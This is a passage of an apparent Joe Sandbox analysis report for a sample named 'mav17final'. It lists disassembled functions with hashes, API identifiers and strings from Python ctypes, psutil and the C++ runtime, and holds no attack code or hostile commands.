                                                  • Opcode Fuzzy Hash: 2c8a630497d9b26071984d54006c75933da3e15f2b28fdb68437a92c613d873a
                                                  • Instruction Fuzzy Hash: 0A812932A09B8286EB50CF69E5442A927A5FB45BEAF441236DB1D577A4DF3CE445C300
                                                  Function 00007FF8B90C3634 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 113COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Buffer_$Arg_BufferContiguousIndexKeywordsLong_Number_Object_ReleaseSsize_tUnpackmemset
                                                  • String ID: argument 'data'$contiguous buffer$decompress
                                                  • API String ID: 2593461735-2667845042
                                                  • Opcode ID: 3b05843de0e9ce16ff05c83b1e5ddb82a75458333f409d7b11fcb9ec86cb24ae
                                                  • Instruction ID: 997f3afed5144c54abfe46c98bd4cfb855a5baa500e1eec575bc5dbfa6e0d290
                                                  • Opcode Fuzzy Hash: 3b05843de0e9ce16ff05c83b1e5ddb82a75458333f409d7b11fcb9ec86cb24ae
                                                  • Instruction Fuzzy Hash: 90412A61A1CB8292EE249F1AE4446B963B5FB49BD4F444231DF5D07B94EF3CE58AC700
                                                  Function 00007FF8B9078910 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Service$CloseConfigErrorHandleLastQuery
                                                  • String ID: (OOOs)$QueryServiceConfigW$automatic$disabled$manual$unknown
                                                  • API String ID: 3136074459-3989453403
                                                  • Opcode ID: a6aea964340cf90a23ab4a988428d36cc1078cd674b3d4c22542f756e6435465
                                                  • Instruction ID: 5fe5c5032eacaee5e87a73444e583a4d6fb87c5e930ae7796288317b59816093
                                                  • Opcode Fuzzy Hash: a6aea964340cf90a23ab4a988428d36cc1078cd674b3d4c22542f756e6435465
                                                  • Instruction Fuzzy Hash: 1A614961A0DAC282EE569F2DA8981796BA1BF65BF0F484131DF1E467A0DF3CE447C700
                                                  Function 00007FF8B9F6BA14 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 126COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _PyDict_GetItemIdWithError.PYTHON311 ref: 00007FF8B9F6BA90
                                                  • PyErr_Occurred.PYTHON311 ref: 00007FF8B9F6BAA3
                                                    • Part of subcall function 00007FF8B9F6BA14: PySequence_GetItem.PYTHON311 ref: 00007FF8B9F6BAE8
                                                    • Part of subcall function 00007FF8B9F6BA14: PySequence_GetItem.PYTHON311 ref: 00007FF8B9F6BAFF
                                                    • Part of subcall function 00007FF8B9F6BA14: PyDict_Contains.PYTHON311 ref: 00007FF8B9F6BB27
                                                    • Part of subcall function 00007FF8B9F6BA14: PyObject_SetAttr.PYTHON311 ref: 00007FF8B9F6BB3C
                                                    • Part of subcall function 00007FF8B9F6BA14: _Py_Dealloc.PYTHON311 ref: 00007FF8B9F6BB4D
                                                    • Part of subcall function 00007FF8B9F6BA14: _Py_Dealloc.PYTHON311 ref: 00007FF8B9F6BB5C
                                                    • Part of subcall function 00007FF8B9F6BA14: PyErr_Format.PYTHON311 ref: 00007FF8B9F6BB97
                                                    • Part of subcall function 00007FF8B9F6BA14: _Py_Dealloc.PYTHON311 ref: 00007FF8B9F6BBA6
                                                    • Part of subcall function 00007FF8B9F6BA14: _Py_Dealloc.PYTHON311 ref: 00007FF8B9F6BBC0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Item$Dict_Err_Sequence_$AttrContainsErrorFormatObject_OccurredWith
                                                  • String ID: duplicate values for field %R
                                                  • API String ID: 1919794741-1910533534
                                                  • Opcode ID: f71277947be2d2287fba46fe0b915e6ba484f6932f6352b1fb4de12eb2f3b1be
                                                  • Instruction ID: 786f80bdb4a5c75d860087bdb77cf0352785d65d6b670fae0d21454ab4a0b7a2
                                                  • Opcode Fuzzy Hash: f71277947be2d2287fba46fe0b915e6ba484f6932f6352b1fb4de12eb2f3b1be
                                                  • Instruction Fuzzy Hash: F9515E21A0DB8681EE549F6AE85857967A4BF85BF7F085231CF1E473A4EE3CE005C300
                                                  Function 00007FF8B9F6D0A8 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 123threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Free$String$Eval_Thread$BuildDeallocErr_ErrorFromInfoLocalObjectProgRestoreSaveValue
                                                  • String ID: iu(uuuiu)
                                                  • API String ID: 2817777535-1877708109
                                                  • Opcode ID: f3fff332be11df24bb43f445367687364f99778bf223ac6a64006d9486d4d9c8
                                                  • Instruction ID: 6533bcf5144183a18baebb441b325f9f22c620cf1e511a1661d1ec055919fe29
                                                  • Opcode Fuzzy Hash: f3fff332be11df24bb43f445367687364f99778bf223ac6a64006d9486d4d9c8
                                                  • Instruction Fuzzy Hash: 2D510566B04A469AEB009F69D8943AC27B0FB89BEAF045536DF0E57B58DF3CD508C310
                                                  Function 00007FF8B9F694A0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 117COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$CheckIndex_Number_OccurredSsize_tString
                                                  • String ID: Array does not support item deletion$Can only assign sequence of same size$indices must be integer
                                                  • API String ID: 428023279-3643249925
                                                  • Opcode ID: 67ecbcca89311aff2d866ea192ce1f612227fb21c186869f9d79deb68ba184de
                                                  • Instruction ID: 09e76799626e496576f0ebf1f65c8b507fb8a0ddc8cc0878f2cc90994220fd99
                                                  • Opcode Fuzzy Hash: 67ecbcca89311aff2d866ea192ce1f612227fb21c186869f9d79deb68ba184de
                                                  • Instruction Fuzzy Hash: D0416E62A08BC281EE548F6ED9500B527A1FF45BFAB086532DF1D47796EE3CE885C310
                                                  Function 00007FF8B9F640BC Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 108COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$AttrObject_$FastLookupSequence_
                                                  • String ID: '%U' is specified in _anonymous_ but not in _fields_$_anonymous_ must be a sequence
                                                  • API String ID: 1391743325-2678605723
                                                  • Opcode ID: 7250101b7d384b3603d10181ac32ac0acd4c5aaae793a49ebea8f6d5bde9a43b
                                                  • Instruction ID: 8c7e962dd1f7a8c0d45762aa746169a407cc93bae1475575c8e7ac6685db3a92
                                                  • Opcode Fuzzy Hash: 7250101b7d384b3603d10181ac32ac0acd4c5aaae793a49ebea8f6d5bde9a43b
                                                  • Instruction Fuzzy Hash: 9A413622A0DB8285EA559F2AE95017867A0FF8ABF6F086135CF0E437A0DF3CE455D300
                                                  Function 00007FF8B9F620E8 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Object_$DeallocErr_$AttrCallCheckClearInstanceLookupRecursiveStringUnicode_
                                                  • String ID: abstract class$while processing _as_parameter_$wrong type
                                                  • API String ID: 4206935778-1173273510
                                                  • Opcode ID: 961a10382abbd73e4d2a667dfe19ccb16767b9e8d8b3bad4ce0000eff4bf0ebe
                                                  • Instruction ID: e2c207d768132ba51fbc7525303fd5e5613af1f0a0821b61143639bb13eb72a1
                                                  • Opcode Fuzzy Hash: 961a10382abbd73e4d2a667dfe19ccb16767b9e8d8b3bad4ce0000eff4bf0ebe
                                                  • Instruction Fuzzy Hash: 17411D62A0CB8282EE509F6DE8441B92760FF89BE6F186131DB0D87765DF7CE445C300
                                                  Function 00007FF8B9F62320 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$Dict_ErrorItemOccurredWith$AttrLookupObject_$Callable_CheckLongLong_MaskSequence_StringTupleTuple_Unsigned
                                                  • String ID: _restype_ must be a type, a callable, or None$class must define _flags_ which must be an integer
                                                  • API String ID: 3087875697-2538317290
                                                  • Opcode ID: c02ca58e13a46a6ce0520458656b58573f0571ee4510cffb2fc4fd828f69ccf3
                                                  • Instruction ID: ad0532cd44e96e8733dda91cb7668975a91a20ac49c346708db2324a7671ec74
                                                  • Opcode Fuzzy Hash: c02ca58e13a46a6ce0520458656b58573f0571ee4510cffb2fc4fd828f69ccf3
                                                  • Instruction Fuzzy Hash: C8412E21A09F8292EE958F29E9403B827A0FF45BE6F586535DB4D873A5DF3CE464C310
                                                  Function 00007FF8B9F6DEDC Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$FormatMem_$Arg_CallocMemoryParseReallocStringTuplememcpy
                                                  • String ID: Memory cannot be resized because this object doesn't own it$On:resize$excepted ctypes instance$minimum size is %zd
                                                  • API String ID: 2473355626-828838525
                                                  • Opcode ID: f25097e4f29e0a836fc8ce735c340e9b52c9a2e89e2e7b96c33704ef34719194
                                                  • Instruction ID: 694b2365e6178be127a396bcacb3205d0d63ad75cddaf8e4e768dad4bb682fc5
                                                  • Opcode Fuzzy Hash: f25097e4f29e0a836fc8ce735c340e9b52c9a2e89e2e7b96c33704ef34719194
                                                  • Instruction Fuzzy Hash: 92312662A19B82C1EE588F1EE8541796770FF89BE6F242036DB0E47764DF2DE894D310
                                                  Function 00007FF8BA24AC40 Relevance: 19.9, APIs: 13, Instructions: 361COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+
                                                  • String ID:
                                                  • API String ID: 2943138195-0
                                                  • Opcode ID: b0c5aa40c95afe9820d08c2b3a0b3f0a0bd29e174dcc6565612d28bd398cd5cc
                                                  • Instruction ID: 375c02fc77ce0a4da22f5ebbe1043b1e7b06d4f203fdcbc42d763955e3e38de9
                                                  • Opcode Fuzzy Hash: b0c5aa40c95afe9820d08c2b3a0b3f0a0bd29e174dcc6565612d28bd398cd5cc
                                                  • Instruction Fuzzy Hash: C2F14A76B08A829AF710DF69D4901FC37B0BB04B8CB4440B6EF5D57A99DE38E559E380
                                                  Function 00007FF8B9F628F0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 197COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: LongLong_MaskTuple_Unsigned
                                                  • String ID: %s 'out' parameter must be passed as default value$NULL stgdict unexpected$call takes exactly %d arguments (%zd given)$paramflag %u not yet implemented
                                                  • API String ID: 1136903700-2588965191
                                                  • Opcode ID: 91dd6e13f2742febeda4ec11071149d11ba9fea3fb7657fd2f121691aebacfe3
                                                  • Instruction ID: f8e7b28863e303b06baa6959b365af28a352030ceff631ceeecba0e59799c42f
                                                  • Opcode Fuzzy Hash: 91dd6e13f2742febeda4ec11071149d11ba9fea3fb7657fd2f121691aebacfe3
                                                  • Instruction Fuzzy Hash: 21812972A09BC286EEA08F1AE4406B967A4FB85BE6F155036DF5D83768DF3CE444C700
                                                  Function 00007FF8B9F6AA7C Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 165COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_String
                                                  • String ID: (%s) $expected %s instance, got %s$incompatible types, %s instance instead of %s instance$not a ctype instance
                                                  • API String ID: 1450464846-2159251832
                                                  • Opcode ID: 07203d23819d05828f358a56c03890258eda92ffb1c002cf2859f9f66371a8e9
                                                  • Instruction ID: ff7bc254bd6e258bc7c7ae312bf671cbd41cc6943f08692162433c507b90489c
                                                  • Opcode Fuzzy Hash: 07203d23819d05828f358a56c03890258eda92ffb1c002cf2859f9f66371a8e9
                                                  • Instruction Fuzzy Hash: C8712961A08B8282EA549F1EE9501B96761FF85FE6F596032DF0E477A9DF2CE440C350
                                                  Function 00007FF8B9F6AEA0 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 145COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Arg_Err_ParseSizeTuple_$FormatString
                                                  • String ID: abstract class$is|Oz#$i|OO$paramflag value %d not supported$paramflags must be a sequence of (int [,string [,value]]) tuples$paramflags must be a tuple or None$paramflags must have the same length as argtypes
                                                  • API String ID: 2189051491-1121734848
                                                  • Opcode ID: 3d6b330cc5c9dd7f19e068a29130591e5b204b1fdfc58b1c50816dd1f366be30
                                                  • Instruction ID: a6a4f7c6ad89992dee6be5665f67f0382e12315abdad1564463642a16813aad7
                                                  • Opcode Fuzzy Hash: 3d6b330cc5c9dd7f19e068a29130591e5b204b1fdfc58b1c50816dd1f366be30
                                                  • Instruction Fuzzy Hash: 91614A72A18B9294EB54CF6AE8402B82BA4FB45BE6F156036DF0D57B58DF3CE585C300
                                                  Function 00007FF8B9075530 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 96memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: fprintf$AllocLocal
                                                  • String ID: CallNtPowerInformation syscall failed$GetActiveProcessorCount() not available; using GetSystemInfo()$GetSystemInfo() failed to retrieve CPU count$psutil-debug [%s:%d]> $psutil/arch/windows/cpu.c
                                                  • API String ID: 2037641928-1734024932
                                                  • Opcode ID: d8bd9561cb941fcef2cdf787d67f6369189f854a544ea81e42c0554565e4153d
                                                  • Instruction ID: 3651d3858dbe36facbfedcce08022593c4023c2aa5b9c04c79e788ed91eec8cf
                                                  • Opcode Fuzzy Hash: d8bd9561cb941fcef2cdf787d67f6369189f854a544ea81e42c0554565e4153d
                                                  • Instruction Fuzzy Hash: 55413B25B1869682EF509F29E8942796BA1AFA4BE0F444035CB0E477A4EF2CE487C700
                                                  Function 00007FF8BA242F14 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 314COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 4223619315-393685449
                                                  • Opcode ID: 1fea5c564d133bdba3aecb898f1e2b7bc476544beebca211cb7a23793dbe9004
                                                  • Instruction ID: 224a2b3f9924bb3d76415db356cb6f68d123238aa9600ff98d635cc1a9290aa4
                                                  • Opcode Fuzzy Hash: 1fea5c564d133bdba3aecb898f1e2b7bc476544beebca211cb7a23793dbe9004
                                                  • Instruction Fuzzy Hash: D9E17B72A08B428AEB20DB69D4402AD7BA4FB45FD8F101176EF8D57B99CF38E584D740
                                                  Function 00007FF8BA24E72C Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 192COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Replicator::operator[]
                                                  • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                  • API String ID: 3676697650-3207858774
                                                  • Opcode ID: ecd4a8ae6d7230611fff1dd4e64a59f99909a897cce7822f33257ee1ddf9a1a8
                                                  • Instruction ID: 57ac3d70ebf749889012696214537efcba48fd103b1504f1a7ecdeb687ebd474
                                                  • Opcode Fuzzy Hash: ecd4a8ae6d7230611fff1dd4e64a59f99909a897cce7822f33257ee1ddf9a1a8
                                                  • Instruction Fuzzy Hash: BD916932A18A8799FB509F28D4502FC27A1BB58B88F8841B2DF5D036A5DF3DE645E350
                                                  Function 00007FF8B9F6AD18 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Arg_AttrDict_Err_FormatObject_ParseSizeStringTuple_Updatememcpy
                                                  • String ID: %.200s.__dict__ must be a dictionary, not %.200s$O!s#$__dict__
                                                  • API String ID: 111561578-4068157617
                                                  • Opcode ID: df2c1ae6872be876c0abca8e9306c520b908d31e559ab2d333eeb8cb4e17a471
                                                  • Instruction ID: 2ba12d0ccc0d60179cceca62ad0c1d5781ec9b15059f77c31738a4d3d0a87870
                                                  • Opcode Fuzzy Hash: df2c1ae6872be876c0abca8e9306c520b908d31e559ab2d333eeb8cb4e17a471
                                                  • Instruction Fuzzy Hash: 2F312972A08F8691EB408F69E8440B827A0FB4ABF6B595136DB5D47754DF3CE454C300
                                                  Function 00007FF8B90CA32C Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
